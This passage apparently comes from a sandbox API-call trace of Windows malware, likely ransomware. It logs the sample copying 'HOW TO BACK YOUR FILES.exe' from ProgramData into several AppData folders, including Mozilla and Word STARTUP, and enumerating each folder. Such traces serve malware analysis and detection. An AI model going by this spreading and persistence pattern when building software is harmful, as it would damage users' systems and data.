dwFlags=0x0, lpMem=0x334fc8 | out: hHeap=0x2b0000) returned 1 [0109.202] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ae8 | out: hHeap=0x2b0000) returned 1 [0109.202] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned 75 [0109.202] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports" [0109.202] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.202] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.203] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.203] GetLastError () returned 0x0 [0109.203] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.203] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.203] CloseHandle (hObject=0x120) returned 1 [0109.203] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.203] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.204] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x720979c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x720979c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.204] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.204] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.204] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions" [0109.204] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0109.204] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ac8 | out: hHeap=0x2b0000) returned 1 [0109.204] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions") returned 64 [0109.204] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions" [0109.204] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.204] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\extensions\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.205] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.205] GetLastError () returned 0x0 [0109.205] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.205] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.205] CloseHandle (hObject=0x120) returned 1 [0109.205] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.205] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.205] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb458e750, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x507d18c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x507d18c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.205] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.205] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.206] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft" [0109.206] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0109.206] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7aa8 | out: hHeap=0x2b0000) returned 1 [0109.206] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned 55 [0109.206] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft" [0109.206] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.206] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.206] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.207] GetLastError () returned 0x0 [0109.207] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.207] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.207] CloseHandle (hObject=0x120) returned 1 [0109.207] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.207] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.207] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x507d18c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x507d18c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.207] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.207] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.207] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word" [0109.207] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0109.207] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b28 | out: hHeap=0x2b0000) returned 1 [0109.207] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word") returned 60 [0109.207] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word" [0109.207] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.207] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\word\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.208] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.208] GetLastError () returned 0x0 [0109.208] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.208] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.208] CloseHandle (hObject=0x120) returned 1 [0109.208] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.209] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.209] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f71aa70, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x507d18c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x507d18c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.209] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.209] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.209] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP" [0109.209] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x320fc8 | out: hHeap=0x2b0000) returned 1 [0109.209] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b28 | out: hHeap=0x2b0000) returned 1 [0109.209] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP") returned 68 [0109.209] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP" [0109.209] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.209] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\word\\startup\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.210] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.210] GetLastError () returned 0x0 [0109.210] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.210] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.210] CloseHandle (hObject=0x120) returned 1 [0109.210] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.210] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.210] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27c7d150, ftCreationTime.dwHighDateTime=0x1d3aaba, ftLastAccessTime.dwLowDateTime=0x507d18c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x507d18c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.210] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.210] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.211] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof" [0109.211] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f06b0 | out: hHeap=0x2b0000) returned 1 [0109.211] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c08 | out: hHeap=0x2b0000) returned 1 [0109.211] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof") returned 62 [0109.211] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof" [0109.211] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.211] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\uproof\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.211] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.212] GetLastError () returned 0x0 [0109.212] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.212] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.212] CloseHandle (hObject=0x120) returned 1 [0109.212] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.212] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.212] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbab2410, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x720979c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x720979c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.212] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.212] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.212] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates" [0109.212] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9c70 | out: hHeap=0x2b0000) returned 1 [0109.212] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c48 | out: hHeap=0x2b0000) returned 1 [0109.212] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates") returned 65 [0109.212] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates" [0109.212] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.212] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\templates\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.213] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.213] GetLastError () returned 0x0 [0109.213] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.213] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.213] CloseHandle (hObject=0x120) returned 1 [0109.213] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.213] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.214] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31d42f10, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x720bdb20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x720bdb20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.214] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.214] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.214] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates" [0109.214] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x335068 | out: hHeap=0x2b0000) returned 1 [0109.214] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c68 | out: hHeap=0x2b0000) returned 1 [0109.214] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates") returned 74 [0109.214] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates" [0109.214] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.214] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.215] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.215] GetLastError () returned 0x0 [0109.215] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.215] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.215] CloseHandle (hObject=0x120) returned 1 [0109.215] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.215] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.215] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*", lpFindFileData=0x2cce1b0 | out: 